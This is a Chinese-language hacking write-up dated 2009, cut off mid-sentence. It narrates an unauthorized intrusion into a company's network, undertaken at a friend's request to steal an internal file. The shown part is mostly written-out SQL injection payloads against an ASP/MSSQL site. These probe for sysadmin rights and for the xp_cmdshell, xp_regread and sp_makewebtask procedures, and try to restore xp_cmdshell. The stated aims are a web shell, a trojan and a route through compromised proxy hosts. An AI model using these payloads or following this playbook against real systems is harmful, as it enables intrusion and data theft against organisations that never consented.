入侵内网一般过程.docxVIP

渗透国内某知名公司内部局域网经过 来源:未知 时间:2009-08-06 13:25 编辑:菇在江湖 本文的目标是一国内知名公司的网络，本文图片、文字都经过处理，均为伪造，如有雷同，纯属巧合。最近一个网友要我帮他拿他们公司内网一项重要的文件，公司网络信息朋友都mail给我了，这些信息主要是几张网络拓扑图以及在内网嗅探到的信息（包括朋友所在的子网的设备用户名及密码等信息……）。参照以上信息总体整理了一下入侵的思路，如果在朋友机器安装木马，从内部连接我得到一个CMD Shell，须要精心伪装一些信息还有可能给朋友带来麻烦，所以选择在该网络的网站为突破口，而且管理员不会认为有“内鬼”的存在。用代理上肉鸡，整体扫描了一下他的网站，只开了80端口，没扫描出来什么有用的信息，就算有也被外层设备把信息过滤掉了，网站很大整体是静态的网页，搜索一下，查看源文件-查找-.asp。很快找到一个类似http://www.*****.com/news/show1.asp?NewsId=125272页面，在后面加上and 1=1 、and 1=2前者正常，后者反回如下错误。Microsoft OLE DB Provider for ODBC Driver error 80040e14 [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character sting”./news/show/show1.asp，行59是IIS+MSSQL+ASP的站，在来提交： http://www.*****.com/news/show1.asp?NewsId=125272 and 1=(select is_srvrolemember(sysadmin))http://www.*****.com/news/show1.asp?NewsId=125272 and sa=(select system_user)结果全部正常，正常是说明是当前连接的账号是以最高权限的SA运行的，看一下经典的“sp_cmdshell”扩展存储是否存在，如果存在那就是初战告捷。http://www.*****.com/news/show1.asp?NewsId=125272 and 1=(select count(*) from master.dbo.sysobjects where xtype = ‘x’ and name = xp_cmdshell)失败，看看是否可以利用xplog70.dll恢复，在提交：http://www.*****.com/news/show1.asp?NewsId=125272;exec master.dbo.sp_addextendedproc xp_cmdshell,’xplog70.dll’在试一下xp_cmdshell是否恢复了，又失败了，看样管理是把xp_cmdshell和xplog70.dll删除了，想利用xp_cmdshell“下载”我们的木马现在是不可能的。首先我们先要得到一个WEB Shell，上传xplog70.dll，恢复xp_cmdshell在利用xp_cmdshell运行我们上传的木马，这都是大众入侵思路了，前辈们以经无数人用这个方法入侵成功。拿出NBSI扫一下，一会后台用户名和密码是出来了，可是后台登录地址扫不出来，测试了N个工具、手工测试也没结果，有可能管理员把后台删除了。我们想办法得到网站的目录，这时就须要用到xp_regread、sp_makewebtask两个扩展存储，试一下是否存在：http://www.*****.com/news/show1.asp?NewsId=125272and 1=(select count(*) from master.dbo.sysobjects where name = xp_regread)http://www.*****.com/news/show1.asp?NewsId=125272and 1=(select count(*) from master.dbo.sysobjects where xtype=X and name = sp_makewebtask)全部返回正常说明存在(一般的网管不太了解他们，存在也很正常)，首先简单介绍一下xp_regread扩展存储过程及sp_makewebtask Web助手存储过程，xp_regread是用来读取注册表信息的，我们可以通过这个来得到保存在注册表中的Web绝对路径。sp_makewebtask这个就是我们用来得到WEB Shell的，主要功能就是导出数据库中表的记录为文件。这个方法网上很早就出现了，我